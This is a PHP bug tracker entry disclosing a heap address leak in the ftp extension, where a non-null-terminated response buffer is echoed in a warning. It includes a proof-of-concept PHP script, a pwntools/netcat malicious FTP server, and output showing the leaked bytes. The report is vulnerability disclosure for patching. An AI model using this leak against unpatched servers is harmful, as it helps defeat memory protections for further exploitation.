|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull Requests
Pull requests:
HistoryAllCommentsChangesGit/SVN commits
[2021-03-23 23:10 UTC] stas@php.net
-Status: Open
+Status: Feedback
[2021-03-23 23:10 UTC] stas@php.net
[2021-03-24 10:13 UTC] cmb@php.net
[2021-03-27 18:46 UTC] zengyhkyle at asu dot edu
-Status: Feedback
+Status: Open
[2021-03-27 18:46 UTC] zengyhkyle at asu dot edu
[2021-03-29 04:12 UTC] stas@php.net
-Status: Open
+Status: Feedback
[2021-03-29 04:12 UTC] stas@php.net
[2021-03-30 19:22 UTC] zengyhkyle at asu dot edu
-Status: Feedback
+Status: Open
[2021-03-30 19:22 UTC] zengyhkyle at asu dot edu
[2021-04-13 10:15 UTC] cmb@php.net
[2021-04-14 06:00 UTC] stas@php.net
-Type: Security
+Type: Bug
[2021-04-14 06:00 UTC] stas@php.net
[2021-04-21 15:23 UTC] cmb@php.net
-Status: Open
+Status: Verified
-PHP Version: 8.0.4RC1
+PHP Version: 7.4
-Assigned To:
+Assigned To: cmb
[2021-04-21 15:23 UTC] cmb@php.net
[2021-04-21 16:23 UTC] cmb@php.net
[2021-04-22 12:16 UTC] cmb@php.net
[2021-04-26 12:47 UTC] git@php.net
[2021-04-26 12:47 UTC] git@php.net
-Status: Verified
+Status: Closed
[2021-04-26 13:10 UTC] git@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Fri Apr 19 13:01:30 2024 UTC |
Description: ------------ In ftp extension, it uses `struct ftpbuf` to keep track of the communication with a remote ftp server. A simplified version of `struct ftpbuf` is listed as below ~~~ typedef struct ftpbuf { ... char inbuf[FTP_BUFSIZE]; /* last response text */ char *extra; /* extra characters */ ... }; ~~~ in `php-src/ftp.c`, inbuf is treated as a byte buffer, and it is not null-terminated. The function using it is `ftp_readline`. If an attacker sends a request to his own server, the server can respond with a very long line which fails `ftp_readline`. At this moment, the buffer is fully filled. The failure of `ftp_readline` triggers a failure in upper layer which eventually triggers `php_error_docref(NULL, E_WARNING, "%s", ftp->inbuf);` in `php_ftp.c`. It assumes `ftp->inbuf` is null-terminated while it is not. And then it prints the `extra` pointer out to the attacker. By carefully setup the warning handler, the attacker can intercept the leaked heap address for later exploitation. This vulnerability is found by Yihui Zeng, Jayakrishna Menon, Steven Wirsz, and Gokul Krishna P from Arizona State University for class CSE598 Applied Vulnerability Research Test script: --------------- test.php ------ <?php set_error_handler("warning_handler", E_WARNING); function warning_handler($errno, $errstr) { echo "caught!\n"; echo $errno; echo $errstr; echo "caught end!\n"; } $conn = ftp_connect("127.0.0.1", 8333); $a = ftp_systype($conn); ?> server.py -------------- from pwn import * r = process(["/bin/nc", "-lvp", "8333"]) r.send("220 \n") r.sendafter("SYST", "\n"+" "*4096) Actual result: -------------- $ ./php test.php 12 Warning: ftp_systype(): a��=V in /home/hacker/test.php on line 6 bool(false) 3